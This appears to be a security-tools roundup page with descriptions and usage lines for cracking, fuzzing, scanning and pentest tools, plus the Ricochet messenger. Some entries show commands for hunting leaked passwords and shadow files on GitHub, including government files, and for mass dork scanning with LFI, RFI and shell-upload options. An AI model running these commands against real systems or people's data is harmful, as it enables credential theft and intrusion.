Large Scale Brute Force Cryptanalysis - Wisecracker

Large scale brute force cryptanalysis needs a tremendous amount of computational power that government agencies like the NSA and companies like Google have.

An average security researcher might want to have such capabilities as well but they do not have the tools or the computational resources. Moreover, they might not be skilled in writing software that takes advantage of the computational resources provided by commercial-off-the-shelf systems with CUDA and OpenCL capable GPUs and computational clusters provided by Amazon EC2 and Microsoft Azure.

With Wisecracker we bridge this gap by providing an open source framework for security researchers to write their own cryptanalysis tools that can distribute brute force cryptanalysis work across multiple systems with multiple multi-core processors and GPUs. Security researchers can also use the sample tools provided as part of Wisecracker out-of-the-box.The differentiating aspect of Wisecracker is that it uses OpenCL and MPI together to distribute the work across multiple systems each having multiple CPUs and/or GPUs. We support the OpenCL libraries provided by Intel, AMD and NVIDIA, and support multiple operating systems such as Linux, Microsoft Windows and Apple’s Mac OSX.

Large Scale Brute Force Cryptanalysis: Wisecracker documentationLarge Scale Brute Force Cryptanalysis

Wisecracker is licensed under the GNU General Public License version 3 and is free for anyone to use. The source code and latest downloadable version of Wisecracker can be downloaded from Github.

Technical Details

Wisecracker comes with a C and C++ API for the user to write their own custom cryptanalysis software using a combination of OpenCL, C and/or C++.

Wisecracker internally uses a divide and conquer algorithm to distribute work or tasks across multiple systems which then internally use a round-robin style distribution for tasks to be distributed between OpenCL devices on that system.

An example application such as the MD5 password cracker is provided as a demonstration on how to use Wisecracker and also as a ready-to-use application for cracking passwords of up to 8 characters.

A user can download Wisecracker on a GPU cluster virtual machine provided by Amazon EC2 and reverse an MD5 cryptographic hash for a 6 character password in about 20 minutes if using 1 virtual machine or in about 3 minutes if using 2.

More applications for cracking cryptographic hashes such as SHA-1, SHA-256 and others will be added in the near future.

Download Wisecracker

Read More

Search engine that allows computer scientists - Censys

Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet. Driven by Internet-wide scanning, Censys lets researchers find specific hosts and create aggregate reports on how devices, websites, and certificates are configured and deployed. [more information]

Access Censys

Read More

Simple FTP Fuzzer - SFTPfuzzer

SFTPfuzzer (Simple FTP Fuzzer) is a very simple software written in Python 2.7 (by 0x8b30cc), that allows you to easily fuzz username and password field in an FTP Server, looking for a buffer overflow vulnerability.

SFTPfuzzer is written in a very simple way, and the code is well commented, allowing you to easily understand what is going on and easily edit the software. The code is licensed under GNU General Public License (GPL v3), if you want to know more read here.

Usage:

You can use SFTPfuzzer.py in two ways, manual mode and arguments mode.

If you want to manually add target ip address (RHOST) and target port (RPORT), you just need to run:

$ python SFTPfuzzer.py

If you want to add command line arguments, then the usage will be like this:

$ python SFTPfuzzer.py -t <rhost> -p <rport>

For example:

$ python SFTPfuzzer.py -t 192.168.1.8 -p 21

Download SFTPfuzzer

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday 1.0.17

Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.


The first of many releases in 2016, Faraday v.1.0.17 (Community, Pro & Corp) introduces a new Maltego Plugin, support for Mint 17 and Kali Rolling, and several fixes including installation issues.

Changes:

ºNew Maltego Plugin
ºAdded support for Kali Rolling Edition
ºAdded support for Mint 17
ºAdded user notification when the current Workspace doesn't exist
ºAdded removeBySeverity.py script - as its name describes, it removes all vulns with a 

specific severity value. It supports the following parameters:

-v extended output
-t dry-run, won't connect to DB
-s severity to filter by, required
-d workspace, required

python $FARADAY/helpers/removeBySeverity.py -d WORKSPACE_NAME -s SEVERITY -v 


Bug fixes:

ºFixed bug in pip Debian
ºFixed pip install bug
ºChecks additionals about dependencies in installation
ºWarning about a upgrade to experimental in debian installation
ºFixed small bug in CSV importing
ºFixed styles for Status Report
ºFixed bug on Status Report filter after editing
ºShow all evidence files in Status Report
ºFixed Arachni Plugin bugs


We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com/

https://twitter.com/faradaysec

Download Faraday

Read More

Automatic search for GitHub - GitMiner

 + Autor: Danilo Vaz a.k.a. UNK
 + Blog: http://unk-br.blogspot.com
 + Github: http://github.com/danilovazb
 + Twitter: https://twitter.com/danilovaz_unk

DESCRIPTION

Advanced search tool and automation in Github.
This tool aims to facilitate research by code or code 
snippets on github through the site's search page.

MOTIVATION

Demonstrates the fragility of trust in public repositories to store codes with sensitive information.

REQUERIMENTS

argparse
requests
json
lxml

INSTALL

git clone http://github.com/danilovazb/GitMiner

sudo apt-get install python-requests python-lxml 

OR

pip install lxml requests

HELP

Automatic search for GitHub.                                                            
 + Autor: Danilo Vaz a.k.a. UNK
 + Blog: http://unk-br.blogspot.com
 + Github: http://github.com/danilovazb
 + Gr33tz: l33t0s, RTFM


[-h] [-q 'filename:shadown path:etc']
       [-m wordpress] [-o result.txt]

optional arguments:
  -h, --help            show this help message and exit
  -q 'filename:shadown path:etc', --query 'filename:shadown path:etc'
                        Specify search term
  -m wordpress, --module wordpress
                        Specify the search module
  -o result.txt, --output result.txt
                        Specify the output file where it will be

                        saved

EXAMPLE

Searching for wordpress configuration files with passwords:


$:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt

Looking for brasilian government files containing passwords:

$:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas

Looking for shadow files on the etc paste:

$:> python git_miner.py --query 'filename:shadow path:etc' -m root

Searching for joomla configuration files with passwords:


$:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla

Download GitMiner

Read More

Android Pentesting Portable Integrated Environment - Appie v3

Appie is a software package that has been pre-configured to function as an Android Pentesting Environment on any windows based machine without the need of a Virtual Machine(VM) or dualboot.

It is completely portable and can be carried on USB stick or your smartphone. It is one of its kind Android Security Analysis Tool and is a one stop answer for all the tools needed in Android Application Security Assessment, Android Forensics, Android Malware Analysis.

Difference between Appie and existing environments ?

• Tools contained in Appie are running on host machine instead of running on virtual machine.
• Less Space Needed(Only around 1.5GB required compared to atleast 10 GB of Virual Machine)
• As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any configuring changes.
• Awesome Interface

Below are some of changes which have been made from previous version:

• It now have Python 2.7.11(32 bit) so that even 32 bit systems have no problem with usage.
• Also updated the Conemu framework which i use as a base terminal.
• Although all the tools are now updated in Appie, but in this version i have introduced a simple update script through which you can update all the tools inside Appie without downloading new version of Appie. So at the end this saves your lot of time.
• It is lot more faster now, if you are an existing user of Appie than you will notice that.
• Some new tools have been included in this version:-
  • I have replaced Sublime Text with open-source Atom text editor.
  • ByteCodeViewer
  • jadx
  • SQLite Database Browser
  • SQLmap
  • Included Mozilla Firefox with some security addons.
  • AndroBugs Framework
  • And finally Appie has a logo.

Demo Video

Below is short demonstration video of Appie.

More: https://manifestsecurity.com/appie-version-3-released/

Download Appie v3

Read More

Search Site Server Scanner - ATSCAN v6.2

Description:

• SEARCH engine
• XSS scanner.
• Sqlmap.
• LFI scanner.
• Filter wordpress and Joomla sites in the server.
• Find Admin page.
• Decode / Encode MD5 + Base64.
• Ports scan.
• Scan E-mails in sites.
• Use proxy.
• Random user agent.
• Fandom search engine.
• Scan errors.
• Detect Cms.
• Multiple instant scan.
• Disponible on BlackArch Linux Platform.

Libreries to install:

ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl

NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Download & Executution:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x ATSCAN
OR
$chmod +x atscan.pl
Execute: perl ./atscan.pl
Help: perl ./atscan.pl --help
Update: perl ./atscan.pl --update

Screenshots:

Help:

--proxy
Set tor proxy [Ex: socks://localhost:9050]
--dork
dork to search [Ex: house,cars,hotel]
--level
Scan level (+- Number of page results to scan)
--xss
Xss scan
--joomrfi
joomla local file inclusion scan
-t
Target
--TARGET
Captured Target
--FULL_TARGET
Captured Full Target
--exp
Set exploit
--valid
Text to validate results
--sqlmap
Sqlmaping xss results
--lfi
local file inclusion
--joomrfi
get joomla sites with rfi
--shell
shell link [Ex: http://www.site.com/shell.txt ]
--wpadf
get wordpress sites with arbitery file download
--admin
get site admin page
--shost
get site subdomains
--ports
scan server ports
--start
start scan port
--end
end scan port
--all
complete mode
--basic
basic mode
--select
Select mode you can set rang of ports
--sites
sites in the server
--wp
get wordpress sites
--joom
Getjoomla sites
--upload
get sites with upload files
--zip
get sites with zip files
--save
file prefix to save results (if not set tool sets one)
--md5
convert to md5
--encode64
encode base64 string
--decode64
decode base64 string
--isup
check http status 200
--email
Extract e-mails
--command
External Command
--replace
string to replace
--with
string to replace with
--save
Set prefix to saved files
--rang
Set range of ip
--nobanner
Hide tool banner
--beep
Produce beep sount if positive scan found

Examples:

Simple search:

Search: --dork [dork] --level [level]
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]
Search + Extract e-mails: --dork [dorks.txt] --level [level] --email

Subscan from Serach Engine:

Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + xss + sqlmap: --dork [dork] --level [10] --xss --sqlmap
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: --rang 133.21.10.155-19.102.25.14 --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:

Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:

-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ..

Server:

Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitry File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp basic (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan rang tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan rang udp: -t [ip] --ports --select udp--start [value] --end [value]
Scan rang udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:

Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:

--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Multiple Scan:

--dork [dork] --level [10] --xss/--lfi/--wp ...
--dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss --lfi --wp ...
-t [ip] --level [10] --xss --lfi --wp ...
-t [targets] --xss --lfi --wp ...

Download ATSCAN

Read More

The Simple, Clear, CouchDB Security Assessment - Audit CouchDB

Audit CouchDB is a simple tool with a powerful message. Given an Apache CouchDB URL, it will tell you everything you ever wanted to know about its security.

Objective

Audit CouchDB will perform the following actions:

1. Learn every possible fact about the couch, for example:
   
   • What is the server configuration?
   • What user accounts exist?
   • What user roles exist?
   • What databases exist?
   • In each database, what is the security setting?
   • In each design document, what are the validation functions?
2. Given the facts, compare them against each other and warn if they imply a security concern, for example:
   
   • You obviously didn't bother to click the "Security" link in the database page in Futon
   • Published CVE alerts apply to your version of CouchDB
   • A design document is missing a validate_doc_update function
   • Helpful summaries of how many admins, normal users, and anonymous users can access each database

Usage

Currently, Audit CouchDB is a Node application distributed via NPM. Install it (globally) via npm.

npm install -g audit_couchdb

Next, run the tool with your CouchDB URL as a parameter. You should connect as an admin user, so Audit CouchDB can fetch all possible information (such as the configuration).

audit_couchdb https://admin:secret@localhost:5984

The tool will output everything it knows about your couch's security.
To see how audit_couchdb is working, set its log level to debug. It will show you each query it makes as it learns facts about your couch.

audit_couchdb --level=debug https://admin:secret@localhost:5984

Running from the Browser

Audit CouchDB is implemented as a library, depending on a back-end request library, and a front-end to display the output (simple console text output, or log4j if it is installed).
I recently re-implemented request in the browser as jQuery Request . Thus I am excited to see Audit CouchDB run on the browser, however I have not begun this work.

Download Audit CouchDB

Read More

Automatic SQL Injection And Database Takeover Tool - SQLMap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.

Download SQLMap

Read More

Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata - Ricochet

There are several encrypted messaging apps for mobile and desktop platforms that shipped with "The Most Secure" tagline but ends up in de-anonymizing the real identity of its users in some or the other way.

In fact, very few encrypted messaging apps available today deal with the core problem of Metadata. 

The majority of apps offer end-to-end encryption that kept the content of your messages away from prying eyes, but your metadata will still be accessible to them, which is enough to know who you really are, and who you're talking to.

But, one messenger app stands out of the crowd by providing superb anonymity to its users, and it is dubbed as "Ricochet."

Ricochet is a peer-to-peer instant messaging system available for Windows, Mac, and Linux and you can trust it as the app has already cleared its first professional security audit carried out by cyber security company NCC Group.

What's so Promising about Ricochet?

Unlike other encrypted messaging clients, Ricochet makes use of TOR hidden services in an effort to maintain its users’ anonymity.

With the help of hidden services, a user's traffic never leaves The Onion Router (TOR) network, which makes it much harder for prying eyes or any attacker to see where the traffic is going or coming from.

Peer-to-Peer Connection: No Servers! No Operators!

Ricochet does not trust anyone in maintaining the privacy of its users; thus, the developers have implemented their app with no server or operator support that could be compromised exposing your personal details.

"The concept with Ricochet is: how can we do messaging without any server in the middle—without trusting anything to forward your messages to your contacts" John Brooks (Ricochet program's maintainer) stated.

"That turns out to be exactly one of the problems that hidden services can solve: to contact someone, without anybody in the middle knowing who you are or who you're contacting."

Here's How Ricochet Works

Ricochet supports cross-platform and is very easy to use even for non-technical users.

Your Username: A Unique .Onion Address

Every Ricochet client hosts a Tor hidden service, and once you sign up for Ricochet, that is actually your Ricochet ID: a unique .onion address.

Only the one with this .onion address can contact you and send messages, which means the contacts connect to you through Tor and not through any intermediate server, making it extremely harder for anyone to know your real identity from your address.

Ricochet Creates Huge Spike in Hidden Addresses

Security researcher Alan Woodward has noticed an unprecedented spike in the number of unique .onion hidden addresses on the Tor network in month of February.

The Statistics shared by the Tor project shows that the number of unique .onion sites has increased by more than 25,000 within 2-3 days.

Researcher believed that this sudden rise could be due to the popularity of Ricochet that creates unique .onion address for every registered user.

Your Messages: End-to-End Encrypted By Default

Besides this, Ricochet also encrypts the contents of your messages by default.

So, to start chatting with someone over Ricochet, you should first know his/her unique Ricochet ID that is being auto-generated at the time of the Ricochet Installation.

Moreover, once the connection is terminated by either the sender or the receiver, the remaining one would not be able to communicate or send messages to the other.

Ricochet Takes Your Security Seriously

The audit by NCC Group discovered a security flaw that could be exploited to deanonymize users, but the good news is that the issue has been resolved in the latest release, Ricochet 1.1.2.

The security vulnerability was independently discovered by a member of the Ricochet community.

Ricochet has been around since 2014 and is now far secured than any other existing encrypted messaging apps. But the app is still in the dogfooding stage, as Brooks referred to the "Be Careful" statement on the project's official website:

"Ricochet is an experiment. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software."

Download Ricochet

Read More